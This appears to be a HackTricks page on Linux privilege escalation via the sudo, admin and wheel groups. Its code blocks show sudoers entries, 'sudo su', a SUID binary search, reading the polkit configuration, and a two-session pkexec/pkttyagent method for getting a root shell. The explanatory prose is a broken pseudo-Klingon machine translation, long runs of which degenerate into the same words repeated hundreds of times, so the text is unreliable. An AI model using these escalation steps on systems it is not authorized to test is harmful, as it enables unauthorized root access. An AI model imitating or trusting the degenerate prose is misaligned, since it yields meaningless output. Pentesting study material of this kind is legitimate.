2022-04-28 16:01:33 +00:00
< details >
2024-02-10 17:52:19 +00:00
< summary > < strong > qaStaHvIS AWS hacking vItlh< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-06 22:59:36 +00:00
Other ways to support HackTricks:
2022-04-28 16:01:33 +00:00
2024-01-06 22:59:36 +00:00
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
* Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
* Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-02-08 21:36:15 +00:00
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**.**
2024-01-06 22:59:36 +00:00
* **Share your hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2022-05-01 12:41:36 +00:00
# Sudo/Admin Groups
2020-07-15 15:43:14 +00:00
2022-05-01 12:41:36 +00:00
## **PE - Method 1**
2020-07-15 15:43:14 +00:00
**Sometimes**, **by default \(or because some software needs it\)** inside the ** /etc/sudoers** file you can find some of these lines:
```bash
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# Allow members of group admin to execute any command
%admin ALL=(ALL:ALL) ALL
```
2024-02-10 17:52:19 +00:00
**qaStaHvIS sudo yIqem** ** 'ej** **qaStaHvIS admin yIqem** ** 'ej** **sudo** **ghItlh** **ghItlh** ** 'ej** **qaStaHvIS root yIqem** .
2020-07-15 15:43:14 +00:00
```text
sudo su
```
2022-05-01 12:41:36 +00:00
## PE - Method 2
2020-07-15 15:43:14 +00:00
2024-02-10 17:52:19 +00:00
**QaS** - QaS 2
2020-07-15 15:43:14 +00:00
2024-02-10 17:52:19 +00:00
**QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS** **QaS**
2020-07-15 15:43:14 +00:00
```bash
find / -perm -4000 2>/dev/null
```
2024-02-10 17:52:19 +00:00
**ghItlhvam**:
jatlh **pkexec** binary SUID binary **ghItlhvam** **sudo** **admin** **belong** ** 'ej** **binaries** **sudo** **pkexec** **ghItlhvam** **execute** **probably** **could** .
2020-07-15 15:43:14 +00:00
2024-02-10 17:52:19 +00:00
**qaStaHvIS**:
2020-07-15 15:43:14 +00:00
```bash
cat /etc/polkit-1/localauthority.conf.d/*
```
2024-02-10 17:52:19 +00:00
**DaH jImej** **pkexec** ** 'ej** **by default** **linux** **vItlhutlh** **sudo** ** 'ej** **admin** **ghaH** **jImej** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root** ** 'ej** **vItlhutlh** ** 'ej** **ghaH** **jImej** **root
2020-07-15 15:43:14 +00:00
```bash
pkexec "/bin/sh" #You will be prompted for your user password
```
2024-02-10 17:52:19 +00:00
**pkexec**-ni jImejDaq **execute** ** 'ej** **error** ** 'ej** **neH** **error** **message** ** 'e'** **neH** :
```bash
Error executing command as another user: Not authorized
This incident has been reported.
```
2020-07-15 15:43:14 +00:00
2024-02-10 17:52:19 +00:00
**pkexec**-wI'vam **execute** **command** ** 'ej** **user** ** 'e'** **neH** **error** ** 'ej** **neH** **error** **message** ** 'e'** **neH** :
2020-07-15 15:43:14 +00:00
2024-02-10 17:52:19 +00:00
```bash
Error executing command as another user: Not authorized
This incident has been reported.
```
2020-07-15 15:43:14 +00:00
```bash
polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie
==== AUTHENTICATION FAILED ===
Error executing command as another user: Not authorized
```
2024-02-10 17:52:19 +00:00
**ghobe' vI'uch 'e' vItlhutlh**. 'ej 'ej vaj 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e'
2020-07-15 15:43:14 +00:00
```bash
echo $$ #Step1: Get current PID
pkexec "/bin/bash" #Step 3, execute pkexec
#Step 5, if correctly authenticate, you will have a root session
```
{% code title="session2" %}
```bash
pkttyagent --process < PID of session1 > #Step 2, attach pkttyagent to session1
#Step 4, you will be asked in this session to authenticate to pkexec
```
{% endcode %}
2024-02-10 17:52:19 +00:00
# Qa'Hom ghoS
2020-07-15 15:43:14 +00:00
2024-02-10 17:52:19 +00:00
**Qa'Hom**, **by default** ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** file ** /etc/sudoers** fil
2020-07-15 15:43:14 +00:00
```text
%wheel ALL=(ALL:ALL) ALL
```
2024-02-10 17:52:19 +00:00
**qaStaHvIS wheel qar'a'** **user** ** 'ej sudo'** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 'ej** **ghap** ** 